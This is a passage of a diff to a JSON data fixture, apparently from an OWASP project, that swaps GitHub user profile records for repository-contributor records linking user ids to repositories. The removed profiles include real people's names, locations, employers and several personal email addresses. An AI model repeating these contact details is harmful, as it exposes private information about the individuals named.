"2024-09-11T19:16:46.359Z", - "name": "", - "login": "kyuz0", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6874658?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2014-03-06T16:09:55Z", - "updated_at": "2024-08-24T15:33:36Z", - "node_id": "MDQ6VXNlcjY4NzQ2NTg=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:40.356Z", + "nest_updated_at": "2024-09-22T15:26:57.392Z", + "contributions_count": 13, + "repository": 10, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 24, "fields": { - "nest_created_at": "2024-09-11T19:16:46.757Z", - "nest_updated_at": "2024-09-11T19:17:05.072Z", - "name": "Leon Derczynski", - "login": "leondz", - "email": "leonderczynski@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/121934?v=4", - "company": "NVIDIA · ITU Copenhagen", - "location": "Copenhagen · Seattle", - "collaborators_count": 0, - "following_count": 23, - "followers_count": 249, - "public_gists_count": 8, - "public_repositories_count": 81, - "created_at": "2009-09-01T14:47:38Z", - "updated_at": "2024-08-12T11:12:48Z", - "node_id": "MDQ6VXNlcjEyMTkzNA==", - "bio": "prof / scientist in cs / nlp / ml", - "is_hireable": false, - "twitter_username": "leonderczynski" + "nest_created_at": "2024-09-22T02:47:40.669Z", + "nest_updated_at": "2024-09-22T15:26:57.702Z", + "contributions_count": 4, + "repository": 10, + "user": 3279 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 25, "fields": { - "nest_created_at": "2024-09-11T19:16:48.089Z", - "nest_updated_at": "2024-09-11T19:16:48.089Z", - "name": "Ivan Kusturic", - "login": "IvanKusturic", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85494415?v=4", - "company": "Vio.com", - "location": "Banja Luka, Bosnia and Herzegovina", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-06-07T11:53:17Z", - "updated_at": "2024-09-03T13:52:52Z", - "node_id": "MDQ6VXNlcjg1NDk0NDE1", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:40.986Z", + "nest_updated_at": "2024-09-22T15:26:58.011Z", + "contributions_count": 4, + "repository": 10, + "user": 3283 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 26, "fields": { - "nest_created_at": "2024-09-11T19:16:50.589Z", - "nest_updated_at": "2024-09-11T19:17:09.274Z", - "name": "Talesh Seeparsan", - "login": "talesh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/759591?v=4", - "company": "Bit79", - "location": "Vancouver", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 56, - "public_gists_count": 4, - "public_repositories_count": 9, - "created_at": "2011-04-29T19:24:35Z", - "updated_at": "2024-04-13T17:42:37Z", - "node_id": "MDQ6VXNlcjc1OTU5MQ==", - "bio": "", - "is_hireable": true, - "twitter_username": "_Talesh" + "nest_created_at": "2024-09-22T02:47:43.872Z", + "nest_updated_at": "2024-09-22T15:27:00.843Z", + "contributions_count": 14, + "repository": 11, + "user": 3284 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 27, "fields": { - "nest_created_at": "2024-09-11T19:16:57.732Z", - "nest_updated_at": "2024-09-11T19:16:57.732Z", - "name": "yael-ps", - "login": "yael-ps", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/164334254?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-03-21T10:06:21Z", - "updated_at": "2024-07-14T11:14:38Z", - "node_id": "U_kgDOCcuKrg", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:44.177Z", + "nest_updated_at": "2024-09-22T15:27:01.151Z", + "contributions_count": 10, + "repository": 11, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 28, "fields": { - "nest_created_at": "2024-09-11T19:16:58.131Z", - "nest_updated_at": "2024-09-11T19:16:58.131Z", - "name": "", - "login": "mkfnch", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2190981?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2012-08-21T16:50:52Z", - "updated_at": "2024-04-29T19:26:30Z", - "node_id": "MDQ6VXNlcjIxOTA5ODE=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:46.972Z", + "nest_updated_at": "2024-09-22T15:27:03.909Z", + "contributions_count": 10, + "repository": 12, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 29, "fields": { - "nest_created_at": "2024-09-11T19:17:01.225Z", - "nest_updated_at": "2024-09-11T19:17:04.667Z", - "name": "", - "login": "mhupfauer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2248537?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 7, - "public_repositories_count": 14, - "created_at": "2012-08-30T13:23:28Z", - "updated_at": "2024-09-09T20:41:49Z", - "node_id": "MDQ6VXNlcjIyNDg1Mzc=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:47.283Z", + "nest_updated_at": "2024-09-22T15:27:04.216Z", + "contributions_count": 4, + "repository": 12, + "user": 3285 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 30, "fields": { - "nest_created_at": "2024-09-11T19:17:01.636Z", - "nest_updated_at": "2024-09-11T19:17:01.636Z", - "name": "DistributedApps.AI", - "login": "kenhuangus", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1869785?v=4", - "company": "DistributedApps.AI", - "location": "", - "collaborators_count": 0, - "following_count": 38, - "followers_count": 13, - "public_gists_count": 3, - "public_repositories_count": 208, - "created_at": "2012-06-19T22:20:18Z", - "updated_at": "2024-09-10T18:21:09Z", - "node_id": "MDQ6VXNlcjE4Njk3ODU=", - "bio": "ChatGPT and Web3\r\nDistributedApps.AI\r\n", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:47.597Z", + "nest_updated_at": "2024-09-22T15:27:04.544Z", + "contributions_count": 1, + "repository": 12, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 31, "fields": { - "nest_created_at": "2024-09-11T19:17:05.919Z", - "nest_updated_at": "2024-09-11T19:17:05.919Z", - "name": "Bill Wilder", - "login": "codingoutloud", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/522806?v=4", - "company": "Development Partners Software LLC", - "location": "Boston", - "collaborators_count": 0, - "following_count": 18, - "followers_count": 30, - "public_gists_count": 62, - "public_repositories_count": 81, - "created_at": "2010-12-14T14:53:29Z", - "updated_at": "2024-09-10T21:42:36Z", - "node_id": "MDQ6VXNlcjUyMjgwNg==", - "bio": "Azure AI and Cybersecurity consultant. Boston Azure founder. Microsoft MVP. ", - "is_hireable": false, - "twitter_username": "codingoutloud" + "nest_created_at": "2024-09-22T02:47:50.484Z", + "nest_updated_at": "2024-09-22T15:27:07.316Z", + "contributions_count": 10, + "repository": 13, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 32, "fields": { - "nest_created_at": "2024-09-11T19:17:08.883Z", - "nest_updated_at": "2024-09-11T19:17:08.883Z", - "name": "Philippe Schrettenbrunner", - "login": "phischde", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5195734?v=4", - "company": "MaibornWolff GmbH", - "location": "Munich, Germany", - "collaborators_count": 0, - "following_count": 13, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-08-09T07:44:59Z", - "updated_at": "2024-06-16T15:44:46Z", - "node_id": "MDQ6VXNlcjUxOTU3MzQ=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:50.806Z", + "nest_updated_at": "2024-09-22T15:27:07.637Z", + "contributions_count": 7, + "repository": 13, + "user": 3287 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 33, "fields": { - "nest_created_at": "2024-09-11T19:17:10.525Z", - "nest_updated_at": "2024-09-18T17:31:20.408Z", - "name": "", - "login": "idj3", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23086857?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-10-26T21:42:47Z", - "updated_at": "2024-09-09T16:48:25Z", - "node_id": "MDQ6VXNlcjIzMDg2ODU3", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:51.128Z", + "nest_updated_at": "2024-09-22T15:27:07.961Z", + "contributions_count": 1, + "repository": 13, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 34, "fields": { - "nest_created_at": "2024-09-11T19:17:38.469Z", - "nest_updated_at": "2024-09-18T17:31:44.084Z", - "name": "turab", - "login": "turabiaslan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32524544?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-10-04T18:56:35Z", - "updated_at": "2024-09-14T11:46:25Z", - "node_id": "MDQ6VXNlcjMyNTI0NTQ0", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:54.037Z", + "nest_updated_at": "2024-09-22T15:27:10.796Z", + "contributions_count": 77, + "repository": 14, + "user": 222 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 35, "fields": { - "nest_created_at": "2024-09-11T19:17:57.386Z", - "nest_updated_at": "2024-09-16T20:01:35.211Z", - "name": "", - "login": "github-actions[bot]", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/in/15368?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-07-30T09:30:16Z", - "updated_at": "2018-09-18T23:02:41Z", - "node_id": "MDM6Qm90NDE4OTgyODI=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:54.356Z", + "nest_updated_at": "2024-09-22T15:27:11.131Z", + "contributions_count": 13, + "repository": 14, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 36, "fields": { - "nest_created_at": "2024-09-11T19:18:52.568Z", - "nest_updated_at": "2024-09-11T19:18:57.113Z", - "name": "JITU RANJAN", - "login": "Jitu-Ranjan", - "email": "jitu.ranjan007@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/27674141?v=4", - "company": "", - "location": "United Kingdom", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 39, - "created_at": "2017-04-17T08:55:27Z", - "updated_at": "2024-08-07T11:38:50Z", - "node_id": "MDQ6VXNlcjI3Njc0MTQx", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:54.664Z", + "nest_updated_at": "2024-09-22T15:27:11.441Z", + "contributions_count": 3, + "repository": 14, + "user": 3288 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 37, "fields": { - "nest_created_at": "2024-09-11T19:18:58.754Z", - "nest_updated_at": "2024-09-18T17:32:42.194Z", - "name": "", - "login": "errXprintln", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75133807?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-11-27T15:55:53Z", - "updated_at": "2024-09-05T14:22:26Z", - "node_id": "MDQ6VXNlcjc1MTMzODA3", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:09.982Z", + "nest_updated_at": "2024-09-22T15:27:26.629Z", + "contributions_count": 23, + "repository": 19, + "user": 3289 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 38, "fields": { - "nest_created_at": "2024-09-11T19:19:15.526Z", - "nest_updated_at": "2024-09-18T17:32:56.695Z", - "name": "Peter Lai", - "login": "sc0Vu", - "email": "alk03073135@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/10494397?v=4", - "company": "", - "location": "Taiwan", - "collaborators_count": 0, - "following_count": 117, - "followers_count": 252, - "public_gists_count": 29, - "public_repositories_count": 293, - "created_at": "2015-01-12T06:36:28Z", - "updated_at": "2024-09-16T18:38:25Z", - "node_id": "MDQ6VXNlcjEwNDk0Mzk3", - "bio": "Creator of web3.php. Research distributed system. Learn and discover new edge technology mev, layer 2, proof of stake, zkps.", - "is_hireable": false, - "twitter_username": "alk03073135" + "nest_created_at": "2024-09-22T02:48:10.323Z", + "nest_updated_at": "2024-09-22T15:27:26.946Z", + "contributions_count": 9, + "repository": 19, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 39, "fields": { - "nest_created_at": "2024-09-11T19:19:15.946Z", - "nest_updated_at": "2024-09-18T17:32:57.022Z", - "name": "Shashank", - "login": "Shashank-In", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16235299?v=4", - "company": "CredShields", - "location": "India", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 176, - "public_gists_count": 24, - "public_repositories_count": 22, - "created_at": "2015-12-10T05:06:11Z", - "updated_at": "2024-06-12T06:13:56Z", - "node_id": "MDQ6VXNlcjE2MjM1Mjk5", - "bio": "CEO @Credshields building SolidityScan.com | Part-time bug-bounty hunter. Listed in Google, Facebook, Apple hall of fame for reporting security issues", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:10.698Z", + "nest_updated_at": "2024-09-22T15:27:27.256Z", + "contributions_count": 4, + "repository": 19, + "user": 3291 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 40, "fields": { - "nest_created_at": "2024-09-11T19:19:49.004Z", - "nest_updated_at": "2024-09-18T18:55:23.828Z", - "name": "Jeroen Willemsen", - "login": "commjoen", - "email": "jeroenwillemsen2001@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1457214?v=4", - "company": "", - "location": "NL", - "collaborators_count": 0, - "following_count": 29, - "followers_count": 113, - "public_gists_count": 1, - "public_repositories_count": 57, - "created_at": "2012-02-21T12:41:47Z", - "updated_at": "2024-09-13T11:41:14Z", - "node_id": "MDQ6VXNlcjE0NTcyMTQ=", - "bio": "PSA & Full Stack Developer\r\nProject lead OWASP WrongSecrets", - "is_hireable": false, - "twitter_username": "commjoenie" + "nest_created_at": "2024-09-22T02:48:11.032Z", + "nest_updated_at": "2024-09-22T15:27:27.567Z", + "contributions_count": 1, + "repository": 19, + "user": 198 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 41, "fields": { - "nest_created_at": "2024-09-11T19:19:49.826Z", - "nest_updated_at": "2024-09-13T03:39:11.097Z", - "name": "Rob van der Veer", - "login": "robvanderveer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/796794?v=4", - "company": "Software Improvement Group, OWASP, NEN, ISO/IEC, CIP", - "location": "Amsterdam", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2011-05-18T21:16:18Z", - "updated_at": "2024-04-11T12:54:55Z", - "node_id": "MDQ6VXNlcjc5Njc5NA==", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:14.010Z", + "nest_updated_at": "2024-09-22T15:27:30.306Z", + "contributions_count": 10, + "repository": 20, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 42, "fields": { - "nest_created_at": "2024-09-11T19:19:53.237Z", - "nest_updated_at": "2024-09-13T03:39:12.469Z", - "name": "karthik Ramamoorthy", - "login": "spbreed", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8321991?v=4", - "company": "Cloud Technology Partners", - "location": "United States", - "collaborators_count": 0, - "following_count": 34, - "followers_count": 12, - "public_gists_count": 4, - "public_repositories_count": 109, - "created_at": "2014-07-31T16:15:23Z", - "updated_at": "2024-07-24T16:27:38Z", - "node_id": "MDQ6VXNlcjgzMjE5OTE=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:16.934Z", + "nest_updated_at": "2024-09-22T15:27:33.185Z", + "contributions_count": 10, + "repository": 21, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 43, "fields": { - "nest_created_at": "2024-09-11T19:20:33.427Z", - "nest_updated_at": "2024-09-18T19:12:06.705Z", - "name": "Jon Gadsden", - "login": "jgadsden", - "email": "jon.gadsden@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/29352392?v=4", - "company": "@pingidentity", - "location": "Bristol, UK", - "collaborators_count": 0, - "following_count": 436, - "followers_count": 226, - "public_gists_count": 0, - "public_repositories_count": 37, - "created_at": "2017-06-11T10:30:41Z", - "updated_at": "2024-09-16T15:03:44Z", - "node_id": "MDQ6VXNlcjI5MzUyMzky", - "bio": "Software security engineer", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:17.284Z", + "nest_updated_at": "2024-09-22T15:27:33.509Z", + "contributions_count": 2, + "repository": 21, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 44, "fields": { - "nest_created_at": "2024-09-11T19:20:48.054Z", - "nest_updated_at": "2024-09-18T18:54:17.156Z", - "name": "Raushan Raj", - "login": "sttor", - "email": "raushan.raj@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/54439583?v=4", - "company": "Sttor ", - "location": "Delhi", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 13, - "public_gists_count": 4, - "public_repositories_count": 89, - "created_at": "2019-08-23T11:11:37Z", - "updated_at": "2024-08-28T15:56:39Z", - "node_id": "MDQ6VXNlcjU0NDM5NTgz", - "bio": "Code for Cybersecurity.\r\n\r\n@raushan@infosec.exchange", - "is_hireable": false, - "twitter_username": "raushan_rajj" + "nest_created_at": "2024-09-22T02:48:20.260Z", + "nest_updated_at": "2024-09-22T15:27:36.302Z", + "contributions_count": 10, + "repository": 22, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 45, "fields": { - "nest_created_at": "2024-09-11T19:20:51.163Z", - "nest_updated_at": "2024-09-11T19:20:54.956Z", - "name": "Shaik Ajmal", - "login": "pwned-17", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61360833?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 19, - "followers_count": 3, - "public_gists_count": 7, - "public_repositories_count": 48, - "created_at": "2020-02-22T18:46:33Z", - "updated_at": "2024-08-13T05:43:14Z", - "node_id": "MDQ6VXNlcjYxMzYwODMz", - "bio": "GSoC'21 @ OWASP Foundation | InfoSec | Python Developer | CEH |", - "is_hireable": false, - "twitter_username": "mocking_aj" + "nest_created_at": "2024-09-22T02:48:20.580Z", + "nest_updated_at": "2024-09-22T15:27:36.623Z", + "contributions_count": 6, + "repository": 22, + "user": 3292 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 46, "fields": { - "nest_created_at": "2024-09-11T19:20:52.434Z", - "nest_updated_at": "2024-09-11T19:20:52.434Z", - "name": "Ryan Nguyen", - "login": "RangerJavelin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55316863?v=4", - "company": "Microsoft APAC", - "location": "Singapore", - "collaborators_count": 0, - "following_count": 1176, - "followers_count": 41, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-09-14T11:13:28Z", - "updated_at": "2024-09-11T07:11:40Z", - "node_id": "MDQ6VXNlcjU1MzE2ODYz", - "bio": "Cybersecurity Specialist", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:20.899Z", + "nest_updated_at": "2024-09-22T15:27:36.932Z", + "contributions_count": 1, + "repository": 22, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 47, "fields": { - "nest_created_at": "2024-09-11T19:21:27.399Z", - "nest_updated_at": "2024-09-18T17:34:33.026Z", - "name": "Reelix", - "login": "Reelix", - "email": "reelix+github@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/289404?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 12, - "followers_count": 33, - "public_gists_count": 32, - "public_repositories_count": 37, - "created_at": "2010-05-28T05:51:10Z", - "updated_at": "2024-02-14T14:55:32Z", - "node_id": "MDQ6VXNlcjI4OTQwNA==", - "bio": "", - "is_hireable": true, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:23.733Z", + "nest_updated_at": "2024-09-22T15:27:39.728Z", + "contributions_count": 97, + "repository": 23, + "user": 3293 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 48, "fields": { - "nest_created_at": "2024-09-11T19:22:04.950Z", - "nest_updated_at": "2024-09-18T18:55:24.147Z", - "name": "Ben de Haan", - "login": "bendehaan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53901866?v=4", - "company": "ENACT-IT", - "location": "Netherlands", - "collaborators_count": 0, - "following_count": 15, - "followers_count": 19, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2019-08-08T11:07:42Z", - "updated_at": "2024-09-12T09:41:20Z", - "node_id": "MDQ6VXNlcjUzOTAxODY2", - "bio": "Freelance security consultant & engineer", - "is_hireable": false, - "twitter_username": "BJFdeHaan" + "nest_created_at": "2024-09-22T02:48:24.050Z", + "nest_updated_at": "2024-09-22T15:27:40.046Z", + "contributions_count": 3, + "repository": 23, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 49, "fields": { - "nest_created_at": "2024-09-11T19:22:10.419Z", - "nest_updated_at": "2024-09-12T00:17:43.211Z", - "name": "Freedisch", - "login": "Freedisch", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82499435?v=4", - "company": "", - "location": "Kigali, Rwanda", - "collaborators_count": 0, - "following_count": 29, - "followers_count": 32, - "public_gists_count": 0, - "public_repositories_count": 125, - "created_at": "2021-04-14T07:29:49Z", - "updated_at": "2024-08-24T00:43:08Z", - "node_id": "MDQ6VXNlcjgyNDk5NDM1", - "bio": "Open Source Wizard", - "is_hireable": true, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:24.403Z", + "nest_updated_at": "2024-09-22T15:27:40.392Z", + "contributions_count": 1, + "repository": 23, + "user": 3289 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 50, "fields": { - "nest_created_at": "2024-09-11T19:22:59.495Z", - "nest_updated_at": "2024-09-11T19:22:59.495Z", - "name": "Todor Olev", - "login": "todorolev", - "email": "todor.olev@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25242734?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-01-20T08:35:21Z", - "updated_at": "2023-12-14T17:01:48Z", - "node_id": "MDQ6VXNlcjI1MjQyNzM0", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:27.147Z", + "nest_updated_at": "2024-09-22T15:27:43.187Z", + "contributions_count": 13, + "repository": 24, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 51, "fields": { - "nest_created_at": "2024-09-11T19:23:23.802Z", - "nest_updated_at": "2024-09-11T19:23:23.802Z", - "name": "Jin Kiat Low", - "login": "jklow", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11328118?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2015-03-05T07:46:41Z", - "updated_at": "2024-08-23T11:34:33Z", - "node_id": "MDQ6VXNlcjExMzI4MTE4", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:29.922Z", + "nest_updated_at": "2024-09-22T15:27:45.999Z", + "contributions_count": 13, + "repository": 25, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 52, "fields": { - "nest_created_at": "2024-09-11T19:25:01.630Z", - "nest_updated_at": "2024-09-18T17:37:06.475Z", - "name": "Sk3pper", - "login": "Sk3pper", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13051136?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 7, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-06-25T14:47:07Z", - "updated_at": "2024-09-17T16:25:44Z", - "node_id": "MDQ6VXNlcjEzMDUxMTM2", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:32.758Z", + "nest_updated_at": "2024-09-22T15:27:48.820Z", + "contributions_count": 27, + "repository": 26, + "user": 929 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 53, "fields": { - "nest_created_at": "2024-09-11T19:25:30.961Z", - "nest_updated_at": "2024-09-18T17:37:34.216Z", - "name": "Ankit Choudhary", - "login": "ankit2001", - "email": "ankitchoudhary202.ac@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/44541855?v=4", - "company": "Amazon", - "location": "Kurukshetra,Haryana", - "collaborators_count": 0, - "following_count": 38, - "followers_count": 89, - "public_gists_count": 1, - "public_repositories_count": 84, - "created_at": "2018-10-28T07:43:26Z", - "updated_at": "2024-08-19T04:47:43Z", - "node_id": "MDQ6VXNlcjQ0NTQxODU1", - "bio": "Software Development Engineer @AWS", - "is_hireable": true, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:33.102Z", + "nest_updated_at": "2024-09-22T15:27:49.173Z", + "contributions_count": 13, + "repository": 26, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 54, "fields": { - "nest_created_at": "2024-09-11T19:25:40.204Z", - "nest_updated_at": "2024-09-11T19:25:40.204Z", - "name": "shweta gurnani", - "login": "shwetagurnani", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43384092?v=4", - "company": "", - "location": "Bengaluru, Karnataka", - "collaborators_count": 0, - "following_count": 29, - "followers_count": 84, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2018-09-18T16:38:38Z", - "updated_at": "2024-09-08T19:10:27Z", - "node_id": "MDQ6VXNlcjQzMzg0MDky", - "bio": "SDE II @ Amazon | Microsoft Engage' 21 | Ex- SDE Intern @ Walmart'22, Twitter' 21, Amazon' 21 | Google SPS'20 | CSE @ IIITU", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:35.993Z", + "nest_updated_at": "2024-09-22T15:27:52.084Z", + "contributions_count": 13, + "repository": 27, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 55, "fields": { - "nest_created_at": "2024-09-11T19:26:06.492Z", - "nest_updated_at": "2024-09-11T19:26:06.492Z", - "name": "", - "login": "nickmillerinfosec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81949902?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-04-05T05:59:26Z", - "updated_at": "2024-09-01T02:05:19Z", - "node_id": "MDQ6VXNlcjgxOTQ5OTAy", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:36.326Z", + "nest_updated_at": "2024-09-22T15:27:52.399Z", + "contributions_count": 3, + "repository": 27, + "user": 3294 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 56, "fields": { - "nest_created_at": "2024-09-11T19:26:10.295Z", - "nest_updated_at": "2024-09-16T19:55:05.432Z", - "name": "", - "login": "renovate[bot]", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/in/2740?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-06-02T07:04:12Z", - "updated_at": "2017-06-14T20:22:02Z", - "node_id": "MDM6Qm90MjkxMzk2MTQ=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:36.638Z", + "nest_updated_at": "2024-09-22T15:27:52.716Z", + "contributions_count": 1, + "repository": 27, + "user": 3295 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 57, "fields": { - "nest_created_at": "2024-09-11T19:26:14.301Z", - "nest_updated_at": "2024-09-18T17:38:00.310Z", - "name": "", - "login": "ThunderSon", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32433575?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 8, - "followers_count": 175, - "public_gists_count": 1, - "public_repositories_count": 47, - "created_at": "2017-10-01T13:27:20Z", - "updated_at": "2024-07-05T22:54:41Z", - "node_id": "MDQ6VXNlcjMyNDMzNTc1", - "bio": "Application Security Engineer.\r\nWSTG project lead.\r\nIntegration Standard project lead.", - "is_hireable": false, - "twitter_username": "7hunderson" + 